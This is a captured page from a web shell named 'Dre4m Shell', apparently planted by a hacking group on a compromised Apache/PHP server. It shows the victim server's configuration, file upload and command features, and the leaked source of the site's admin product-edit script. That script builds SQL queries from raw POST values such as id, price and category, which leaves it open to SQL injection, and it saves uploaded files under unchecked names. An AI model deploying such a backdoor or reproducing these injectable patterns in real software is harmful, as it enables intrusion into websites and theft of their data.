Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 3.148.211.202
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /var/www/html/admin/product-edit-action.php
<?php
ob_start();
session_start();
require_once('session-check.php');
require_once('include/db-config.php');
$target_path = "../public/assets/images/productimages/";

$productname=mysqli_real_escape_string($conn,stripslashes($_POST['productname']));
$shortdescription=mysqli_real_escape_string($conn,stripslashes($_POST['shortdescription']));
$longdescription=mysqli_real_escape_string($conn,stripslashes($_POST['longdescription']));
$status=$_POST['status'];
$thirdpartyurl=mysqli_real_escape_string($conn,stripslashes($_POST['thirdpartyurl']));
$downloadableurl=mysqli_real_escape_string($conn,stripslashes($_POST['downloadableurl']));
$trialdownloadurl=mysqli_real_escape_string($conn,stripslashes($_POST['trialurldownload']));
$originalprice=$_POST['originalprice'];
$saleprice=$_POST['saleprice'];
$img1=$_POST['img'];
//$downloadable=$_POST['downloadable'];


if(isset($_POST['freesample'])==1)
{
	$freesample=$_POST['freesample'];
	$freesample="1";
}
else
{
$freesample= "0";
}
if(isset($_POST['downloadable'])==1)
{
  $downloadable=$_POST['downloadable'];
  $downloadable="1";
}
else
{
  $downloadable="0";	
}

if(isset($_POST['meetingdefender'])==1)
{
  $meetingdefender="1";
}
else
{
  $meetingdefender="0";	
}

if(isset($_POST['istrialavailable'])==1)
{
	$istrialavailable = $_POST['istrialavailable'];
	$istrialavailable = "1";
}
else
{
	$istrialavailable = "0";
}
$quantityperpackage=$_POST['quantityperpackage'];
$sortorder=$_POST['sortorder'];


	$img_name = $_FILES["imagefile"]['name'];
	if($img_name=="")
	{
	   
  //  $sql="update productnew set MeetingDefender = ".$meetingdefender.", ProductName='".$productname."',Status='".$status."',ShortDescription='".$shortdescription."', LongDescription='".$longdescription."', ThirdPartyURL='".$thirdpartyurl."', DownloadURL='".$downloadableurl."', DownloadFlag=".$downloadable.", OriginalPrice='".$originalprice."', SalesPrice='".$saleprice."',FreeSampleFlag='".$freesample."',ProductPhoto='".$img1."',QtyPerPackage='".$quantityperpackage."',SortOrder='".$sortorder."',TrialAvail=".$istrialavailable.",Trialurl='".$trialdownloadurl."' where ID = ".$_POST['id'];

	   $sql="update productnew set MeetingDefender = ".$meetingdefender.", ProductName='".$productname."',Status='".$status."',ShortDescription='".$shortdescription."', LongDescription='".$longdescription."', ThirdPartyURL='".$thirdpartyurl."',OriginalPrice='".$originalprice."',  SalesPrice='".$saleprice."',FreeSampleFlag='".$freesample."',ProductPhoto='".$img1."',SortOrder='".$sortorder."',TrialAvail=".$istrialavailable.",Trialurl='".$trialdownloadurl."' where ID = ".$_POST['id'];
   //echo $sql;
	}
else{

$img_name = $_FILES["imagefile"]['name'];
	$img_path = $target_path.$img_name;

	require_once('SimpleImage.php');
   $image = new SimpleImage();
   $image->load($_FILES["imagefile"]['tmp_name']);
   $image->resize(200,300);
   $image->save($img_path);

 $sql="update productnew set MeetingDefender = ".$meetingdefender.", ProductName='".$productname."',Status='".$status."',ShortDescription='".$shortdescription."', LongDescription='".$longdescription."', ThirdPartyURL='".$thirdpartyurl."',SalesPrice='".$saleprice."',FreeSampleFlag='".$freesample."',ProductPhoto='".$img_name."',SortOrder='".$sortorder."',TrialAvail=".$istrialavailable.",Trialurl='".$trialdownloadurl."' where ID = ".$_POST['id'];
 //echo $sql;
}
$result=mysqli_query($conn,$sql);


//$ProductID=mysqli_insert_id();
$ProductID=$_POST['id'];
$catid=$_POST['catid'];
$sql="delete from product_categoires where ProductID=".$_POST['id'];
$result=mysqli_query($conn,$sql);

$values=$_POST['comp'];
$count = count($values);
for ($counter = 0; $counter < $count; $counter++)
{
	if(isset($values[$counter]))
	{
		$cat_id = $values[$counter];
		
		$sql="insert into product_categoires (ProductID,CategoryID) values('".$ProductID."','".$cat_id."')";
        $result=mysqli_query($conn,$sql);
	}
}



$url = "Location: product-mgt.php?r=2";
header($url);
?>

Anon7 - 2022
AnonSec Team